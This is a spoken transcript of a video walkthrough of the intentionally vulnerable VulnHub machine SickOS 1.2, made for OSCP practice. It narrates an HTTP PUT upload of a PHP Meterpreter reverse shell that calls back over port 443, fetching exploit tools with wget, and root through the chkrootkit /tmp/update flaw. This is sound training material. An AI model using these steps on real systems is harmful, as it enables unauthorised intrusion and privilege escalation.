Hey guys, HackerSploit here, back again with another video. Welcome back to the OSCP prep series. In this video, we're going to be taking a look at SickOS 1.2 on VulnHub. It's been a while since we've actually gone through some of the virtual machines on VulnHub, and this is part of the OSCP prep series, especially or specifically the OSCP prep series on VulnHub. So I thought I'd take you guys through it. So this is a box that I did a few days ago, I think, probably about a week ago. And the reason I'm actually recording it late is primarily because I didn't have enough time. So anyway, we can actually get started with it. This box is, in my opinion, I would say is fairly simple to an intermediate level. It's not your typical type of box. And you can download it's about 664 megabytes. It's a Linux box, and you do require DHCP enabled. And yeah, that's pretty much it. So the objective of this particular box is to essentially get the flag and obtain the highest privileges on the system. So I do recommend setting this up with VMware as opposed to VirtualBox, because I did have some issues with that. So that's exactly what I've done. And yeah, we can get started immediately. So what I've actually performed or done right now is I've just performed a quick scan with NetDiscover just to identify the IP address, because I just imported the virtual machine, and the IP is 192.168.1.54. all right, now I'm already within my pre-made directory. If I cat the nmap scan results that I did previously, yeah, this was done on the 9th of November as I was preparing for this, and at that time the IP was 192.168.1.200. So I do apologize for that, but it'll not interfere here. So this was quite a comprehensive scan, and we can see we only get 2 services running. As for the operating system, we know we're getting some rough guesses as to what the kernel is, and in regards to the banners, you can see we know it's running Debian Ubuntu. As for the services, as I said, we have SSH running OpenSSH 5.9 P1, and we have a light HTTPD server running version 1.4.28. all right, so I'm guessing the first thing we can do is start exploring our services that are currently running. So if I just open up the web service here, or the web browser, you can see we get a meme telling us what if computer viruses are really made by the antivirus software companies to make money, right? That's a fairly simple thought. If we view the page source, you can see that we have the image here, and that's just this image right over here. It's blue.jpg, which is interesting, and the page is empty. If we scroll to the bottom, you can see we have a comment saying nothing in here, and it looks like the comment was actually, there's a bit of a syntax error there, which is why it actually has the little greater than symbols right over here. Right, okay, so what we can do is we can actually put this through some directory brute forcing, and again, you can do that through whatever tool you use. What I'll do is I'll just open up a new tab here, and we can use GoBuster. So GoBuster directory brute forcing, and then we have the URL. So HTTP 192.168.1.54, I believe that's the IP, and we then have the word list, which again we can use user share word lists, dirbuster. We can actually use some of the sec lists if you do have sec lists available. Do I have the sec list here? Well, not yet. So again, we can use dirbuster. So dirbuster, and we can use the directory list 2.3 medium.txt and hit enter, and that's going to begin the directory brute force. And yeah, we can go with the standard 10 threads. That's perfectly fine. In the meantime, if we take a look at the other services, you can see we are running OpenSSH 5.9 P1, which again we can just use searchsploit to actually try and enumerate any potential results. You can see with pretty much vague results that have been returned here, and the most likely vulnerability to exist is the username enumeration, which is kind of a rabbit hole in this case. Right, okay, so that hasn't given us anything yet. We actually got a directory, a test directory here. So let's see if we can actually access the test directory. So we say test here, you can see that it tells us we're running light HTTPD 1.4.28, and we have directory listing enabled. If we go back to the parent directory, that works out just fine. What we need to do now is let us see if we can actually use nmap. So yeah, it actually finishes out there, and we get sort of a false positive here. If we go back into nmap here, and if I just list out some of the nmap scripts, so user share nmap scripts, we can actually use the http enum script to actually display any potential hidden directories. So http like so, and we can look for http enum. That's the script right over here. And of course, we then want to see or test for the methods just to make sure we aren't missing anything, which is why, performing enumeration is very, very important. So http enum and http methods. So what we can do is we can say nmap, and this will require root privileges, I guess. So nmap sv, port is port 80, and we are targeting 192.168.1.54, and the script is http enum, right? And we hit enter, and let's see if we get any other hidden directories, or if there are any other hidden directories that we can access. Right, so you can see we just have the test page, and GoBuster didn't give us anything much or anything that we didn't have already, which is fine, I guess. So what we can do now is let's see if we can perform, let's see if we can actually use the http method script. So http methods, I believe that's the name of the script. If I open up my browser here, and let me just look for the documentation, http methods. Let me just look for the documentation here under nmap. I believe that's nmap. There we go, and we have the http methods and nmap script. If we just take a look at the script arguments, if we want to change the URL path, then we can do that by typing in script arguments, http methods, URL path, and the actual path or the subdirectory, which we can actually do with the test directory. Right, so you can see that for the default directory, with the supported methods are get, head, post, and options. If we just run the following script again, and we put in the script arguments, and instead of website, we just put in the subdirectory test and hit enter. Let's see whether we have any special or some really, really interesting supported methods that we can actually use. So there we are. You can see the supported methods we have are pretty much the entire gamut here in regards to HTTP methods, and of course the most important ones being put, delete, etc. So that means we can try and upload files, most likely a reverse shell, onto the web server, and we can do that using curl, I believe. So if we just open up curl, man curl, and grep e, and this, if we actually take a look at the methods here, if we actually use curl, one second, we use I and then X, and we say options, we want to get the options, HTTP 192.168.1.54, and hit enter. Right, that isn't displaying any of the options. And if we say test, let's just put the HTTP here, hit enter. Yeah, all right, so that displays it. That's exactly what we got using the nmap script, so we know that that is working. Right, okay, so one thing before we actually, you can see it's running HTTP 1.0 moved permanently. All right, that's fine. So what we can do is, let me just open up the man pages for curl here, grep e, because I think it's, if we check upload and hit enter, you can see we have the upload file option, which is T, and it looks like it's fairly simple to use. We specify the one file to upload for each URL, and we then specify the directory. So curl upload file, file1, file2, and then the website to which, and I guess the directory to which we want to upload it to. Right, so what we're going to do now is I'm just going to generate a PHP Meterpreter reverse shell here. So we'll use MSF Venom. So sudo MSF Venom, and the payload is going to be PHP. I believe it is Meterpreter. We'll just use this one, reverse. No, it's actually Meterpreter reverse TCP, I believe. Right. All right. So lhost is going to be equal to 192.168.1.54. Well, we actually need to put our IP, my bad. So ifconfig, you can see that is 192.168.1.166. All right, so we'll just put that in there, and we'll then set our L port is equal to 1234, and we then set the format as raw. It's going to be equal to shell.php. Right, and we hit enter, and that's going to generate it for us. And in the next terminal here, we can then open up a Metasploit session. So MSF Venom, MSF console, my bad. And we then set up the multi-handler, and we set the payload. So there we are. That's the PHP reverse shell. And yeah, so we'll say use exploit multi-handler. Sorry, that is multi-handler. Set payload is PHP rev Meterpreter, and that is reverse TCP, I believe. Hopefully that is the correct spelling. There we are. And show options, and we set the L host to 192.168.1.166. Set the L port to 1234, and we can have that running as soon as we upload the shell. Right, so to upload the shell, what we need to do is we need to say curl, and then we say t shell.php, and then we say http 192.168.1.54, and we then want to upload it under test and shell.php, and hit enter, and it tells us expectation failed. Right, so interesting error here. Let's see if we can actually diagnose this. So google.com, and we're looking for curl expectation failed. Let's see if we can actually find any issue here that we might have. Right, so we use the curl option. That's perfectly fine. Yeah, that's not exactly what I'm looking for. Yeah, it looks like it is an issue with so this happens when you're behind a proxy which is running HTTP 1.1 mode, whereas the client is running HTTP 1.0 mode in curl. Right, all right, so we can add HTTP 1.0 in the arguments to solve the issue. Right, so let's try that. So we'll use that here. Let's just put HTTP 1.0, and we can actually see if that uploaded. So if we go into test and refresh that, and there we are, so you can see that that actually uploaded. All right, excellent. So what we can do now is we can start up our multi-handler. If we hit enter, and we then can click on shell.php, and we should get a reverse session. Doesn't look like that is working. There could be an issue here. That uploaded just fine. Let's see what we actually get here. If I open up this one more time, I just want to see what response we get from the shell. If there were any errors with the shell, there shouldn't be any errors. Let me just close this up here. Right, so not really sure what the error is, but let's just see what this generates. Right, so it finishes processing and it gives us an error here. So what we can do is, it looks like this is the one of the great things I like about this box is the issue that we're having here, and actually forgot about it, is the fact that the box only allows outgoing connections to port 80 and port 443, which is understandable. So that means there is some sort of a firewall running, blocking any outgoing connections to any obscure ports like 1, 2, 3, 4. So what that means is we're going to have to regenerate our Metasploit payload. And if I just get rid of shell.php here, and we can just generate it really quickly with MSF Venom, and we'll set the L port to something like 443. So there we are. Hit enter, and we'll also change that within the Metasploit listener here. So set L port to 443, hit enter, and we can then hit run. And it tells us the permission denied. All right, so that means we're going to need root privileges. So MSF console. And I'll just put in my password here really quickly, and then we set up the listener again. So we have the same shell, and we can now upload it back using curl, and we'll just call it let's see, we'll just call it reverse.php, and hopefully that uploads. So I'll hit enter, and we can actually refresh the directory, and again we can actually see that we get reverse.php. Right, all right, so use exploit reverse TCP, and then we set the options as we did before, right? So set lhost, what's my interface name, right? So that doesn't work. So set lhost 192.168.1.166, set the L port to 443, hit enter, and we can then hit run, and yeah, that does bind to port 443. So we can just click on reverse now, and yeah, it looks like we get a interpreter session, which is great. So if we get user ID, you can see we're currently using the data user, which is pretty much what was expected given that we exploited the system through the web server. Right, all right, so if we take a look at, let's perform some system enumeration. So cat etc issue, we're just going to get a into a shell, and cat etc and issue. Let's open that up. That doesn't display much here. So cat etc release. That tells us we're running Ubuntu 12.04, and yeah, it looks like that we're running Ubuntu 12.04 LTS, which is quite an old system. And that's pretty much our initial foothold. So our next step is to perform, local system enumeration to try and understand how we can escalate our privileges. Because if we actually display all the users on the system, you can see that we have the root user, of course, and that's where we want to get. And then we have another user called John, right? And their home directory is under home John. So if we go into the home directory, you can see that we have the user John, and we try and access that directory, and it tells us we can't cd into John, right? Okay, so we can go back in our interpreter. We can now start performing our local system enumeration. Right, so when performing local system enumeration, trying to find out what we can about the system, there's tons of places you can start, but the first is, of course, understanding your environment, what services you have running, and then of course you can then move on to the applications that have been set up and installed, and then we can take a look at things like cron, and we can then start using tools like the Linux exploit suggester, which can really help us understand what exploits we can use to elevate our privileges. Right, so what I'm going to do now is we can actually just spawn we can actually just get a proper shell session or a bash session here. And we can do that by using Python. So we'll just open up a shell, and we can then type in, of course, we can use Python. So Python C, I think we actually have Python, but in any case, we have a interpreter session, so that's perfectly fine. So import pty, and then of course we say pty.spawn, and we then specify the shell that we want to use. My bad. So pty.spawn. And we then specify bin bash. Will that actually work? Let's try it out. So we hit enter, and if we open up bash, we don't get anything much, right? So that does not work. So we can actually just try that one more time. And instead of bash, we can actually try the Bourne shell. So we can actually just copy that one more time there, put that in there, and we can then say bin and the Bourne shell, hit enter. And do we have anything yet? Nothing much. So we aren't getting anything here, which is fine. So we can actually try the other techniques. So I'll just exit from that session. Just want to make sure we only have one session running, right? So if I put this in the background, right, so sessions 1, let's go back in there. Right, so what we can do is if we say shell, let's try and execute it with bin, and then we say, of course, I, and there we are, we get a bash with job control. If we try and go into bash here, I don't think that works out. Right, so it still is working. If I say bash, yeah, that still doesn't work. So we can say bin bash I, and we get a bash session here. Excellent. So the variables haven't been set, the environment variables, which is perfectly fine. Right, all right, so we can get started now. If I print the current working directory, you can see we don't have anything within the test directory. So if we list out everything, we have the reverse PHP shells that we created. And if I go into my home directory, you can see again, we're just within the web directory here. Let's take a look at the temp directory. Let's see if we have anything interesting there. So we have just some various VMware stuff here, which I don't think is important. The OPT directory. Let's see if we have any, third-party pieces of software here, which again I don't think we do. And we've already taken a look at the system information. If we want to, of course, get the kernel version, we can get that by typing in uname A. That tells us we're running version 3.1, which is again quite old at this moment in time. If we go into the John directory, which was very interesting to me, we can hit enter. In this case, we can access it. If we try and access the bash history file, which I doubt we'll have the permissions to do. Right, so there we are, permissions denied. So yeah, that's perfectly fine. If we list out the processes, you can see we have quite a few processes actually that are currently running. None of them looks particularly interesting, so we can actually sort this out, and we can only look for processes that belong to the user root, and we hit enter, and let's see if we have anything interesting that gets or catches our attention. Right, so nothing much there. What we can do is we can actually try and get the Linux exploit suggester. So google.com and Linux exploit suggester. And we can just get the version 1, which works fine on older boxes. Of course, when you're working on newer boxes, you want to use the newer version. Right, so I'll go into the temp directory, which I'm guessing is the only way, but I did remember that we can't actually download files from the internet. So we're going to have to actually set up our own server. So we'll just get the file manually here and on our system before we get in on the box. And we'll just hit enter. So that's going to get in. Then we can say sudo python m simple http server, and we can set that on port 80. Let's see if that actually works. Right, so we can then say wget http 192.168.1.166, and then we say less.sh. Right, then that's because it's on port 80. Let's hit enter. Does port 80 actually work? Not really sure. Doesn't look like it's working, which is fine, I guess. Yeah, that doesn't seem like it's actually responding. So I'll just wait for it to time out. Otherwise, I'll have to, get a bash session again. So I'll change this to port 443 as we did. However, I'm pretty sure we are listening on it, but in any case, I think it should be fine because we've already established our reverse session. So shell. And we can then say bin bash I, and yeah, we get the bash session here. Right, so if we go back into the temp directory, and again we weren't able to get that file, so we can now say wget http. We then say 192.168.1.166, and that is port 443, and we then say that is less.sh, hit enter, and it looks like we got the file. So chmod +x less.sh, hit enter, and we then try and run it. So less.sh, and the script runs, it runs as it should. And again, we can scroll to the topmost exploits, which are the ones that are the ones that are going to be the most probable to exploitation. So, or giving us or allowing us to escalate our privileges. So you can see we have the classic dirty cow, which is what I was looking for exactly. And we can actually copy this link. That's the dirty cow exploit. And let's see if we can download it and compile it. Right. So I'll just save this file and my downloads, and what I'll do is we will just move it into my directory now. So we will go and close this up, and I say move downloads, and this is 40611.c into our current directory. And if we take a look at the exploit 40611, you can see that to compile it we use gcc with pthread, and that's pretty much it. So we can actually compile it on our system. Right, so let me just exit here. So we can just say gcc pthread, and we say 40611.c, and the output is going to be exploit, right? And that's the binary itself. We say chmod +x exploit, and we can then run the previous command, our simple http server here one more time, and we can then try and use wget again. So wget http 192.168.1.166, and then 443, and that is exploit. We're looking for the binary itself. We get the binary. Let's chmod it one more time. So exploit, and if we try and exploit the, we can try and run the binary, and we get told, right, so we get the dreadful message, the exploit, we cannot execute a binary file, which I guess is to do with our permissions. Right, so that means we still need to perform a bit more of system enumeration to try and figure out what we have running exactly. So what we can do is we can list out all the binaries that are currently installed, and that may give us an idea of what we have that we can leverage to our advantage. And yeah, we pretty much have the standard, utilities here that you typically expect, and nothing interesting per se. Of course, yeah, we can actually go through that later if we don't find anything. Let's try and display, or let's try and see what we have running within cron. So cron tab L, the list out. We can see we don't have any cron data there. So if we say lsal, we can then list var spool. And then we say we look for the cron, hit enter. You can see we have the cron tabs themselves. So if we take a look at cron daily, which I think we have, so lsal etc, and we can then say grep and look for cron, right? And you can see we have cron daily, hourly, monthly. So let's actually see this. So cat etc cron cron.daily, and that's a directory, right? So my bad, let's actually list out what's within that. So lsal etc cron, and we're looking for cron.daily, and we list out what's in here. You can see we have various services. So we have apt that runs on a daily basis. We can obviously check what's running hourly, and I'll do that shortly. So let me just copy that command so we don't waste any more time. So cron.hourly, hit enter. So we don't have anything running there. And then of course we have the cron tab. So if we try and display what's within the cron tab, so cat etc cron tab, and we hit enter, you can see that we have that's every 25 anacron, cd and run parts report etc cron daily, weekly and monthly. Okay, so that means we have all of these being run again as designated here. We can actually take a look at the anacron tab here. So cat etc anacron tab, hit enter, which I believe it should actually be in the in the etc directory, which I guess is fine. So if we take a look at the at some of the cron, some of the tasks are added here under the cron daily. You can see we have aptitude, BSD main utilities, and then the CHK rootkit, which is rootkit checker, I believe. So maybe that gives us a good option here. So we can get started with that. So CHK rootkit, we have the permissions. We need root privileges. CHK rootkit. I don't want to run it. Can I open up the help menu? So yeah, it tells us show this help and exit, show the version information. So let's check out the version information. So CHK rootkit version information, and that tells us we're running CHK rootkit version 0.49. Let's copy that and let's see if we can find any potential exploits or anything we can do, or any misconfigurations rather. So I'll just paste that in there, and it looks like there is an exploit there. So if we click on that, we have exploit DB and local privilege escalation, which looks to be a Metasploit module. So let's take a look at the exploit DB exploit firstly, which is quite interesting. So you can see it tells us right over here, we just found a serious vulnerability in the CHK rootkit package, which may allow local attackers to gain root access to a box in a certain configurations under the temp directory not mounted. Okay, so that means it needs to be in the temp directory. So the vulnerability is located in the function slapper, which is right over here. Right, so the line file port, which again is a variable file port, will execute all files in the slapper files as the user CHK rootkit is running, usually under root. If the file port is empty because of missing quotation marks around the variable assignment. So the steps to reproduce it are to put an executable file named update with non-root owner in the temp directory, and then I guess the cron, since it's already running CHK rootkit, it'll actually run that this binary right over here, which will do whatever we want. If we take a look at the local privilege escalation module, which is right over here, which we actually do have a module. So let's take a look at the module before we try and do it manually. So can I exit out of here, and if I say background and we then say sessions, let me just check the session number, there we are. All right, so we can then say use exploit Unix local CHK rootkit, show options. Right, so if we take a look at it here, what version? So CHK rootkit 0.5 before 0.50 will run any executable file named tmp update as root, allowing trivial privilege escalation. And right, okay, so I guess this will give us a reversal automatically, because it again is telling us to specify the sessions. So session, specify the session 1, and what is the L port? Set L port to let's say 8080 and hit run and hit enter. Right, so it's going to say started the reverse TCP handler on the IP right over here. Routing depends on the cron tab. This could take a while. That is actually true. It was set daily. So the payload gets written to TMP under update, and it's going to wait for CHK rootkit to run via cron. So this will take time depending on how much you know, the actual definition of the cron, the time definition that is, and how long you know, before every period of time it will actually run. So I'll just wait for this to run. Once cron runs CHK rootkit, it'll execute the payload written under temp and update, and there we are. It actually did it right in front of us here. Right, so it tells us we get these. Yeah, so this is a typical reverse shell, and we get a command shell in this case. And if we, you know, list out the ID, we can see we have root access, so that worked out just fine. So our job is to actually read the flag. So let's go under root, and if I list out all the files in here, we have this is the root file, I guess. So we can just copy that cat, and I'll paste that in here and hit enter. So it tells us, the flag is telling us, wow, if you're viewing this, you have successfully completed SickOS 1.2. The challenge is more focused on the elimination of tools in real scenarios where tools can be blocked during an assessment and thereby fooling testers. Which is true, because if you were going to use an automated tool or directory brute forcing tool, like dir buster and you only found the test directory without analyzing the HTTP methods, you would have missed the fact that you can actually upload a reverse shell. And I did make a video on this with Nmap, if you look at my Nmap series, and I remember getting a lot of comments in the videos telling me, well, this is not important. Why are HTTP methods important? Well, I just showed you why. Understanding what's running on a web server is really, really important and, you know, can expose potential vulnerabilities. So though while developing, many of the tools were limited or completely blocked to get a feel of old school and testing it manually. Right, so a great box. I think it's very unorthodox in the way, you know, it actually forces you to think outside of the box in regards to, you know, your initial foothold, and then of course privilege escalation, because people will usually automatically get the exploit suggester script and then of course try and get a privilege escalation script on the box and get root that way. But in this, I really like the ability or the process of going through local enumeration and trying to find various services that are running and ways you can actually get in, similar to what we did with chk rootkit. So that's pretty much going to be it for this video, guys. Let me know what you guys think in the comments. Would love to hear your feedback. You can also reach out to us on Twitter, and you can find a write-up for this particular box on our website at HackerSploit.org, and I'll be seeing you in the next video. Peace. I just want to take a moment to thank all our Patreons at patreon.com/HackerSploit for all the support. Your support and help is truly appreciated. You keep us making newer and fresher and better content. So I just want to say thank you to all the Patreons. So thank you, Murph the Surf, Daniel Bork, Jonathan Kyle, Adam Mack, Jamal Guillory, Dafim Bari, Jeremy Nikolai, Mary Hara, Max Chow, Dustin Umpress, Michael Hubbard, and Jerry Speds.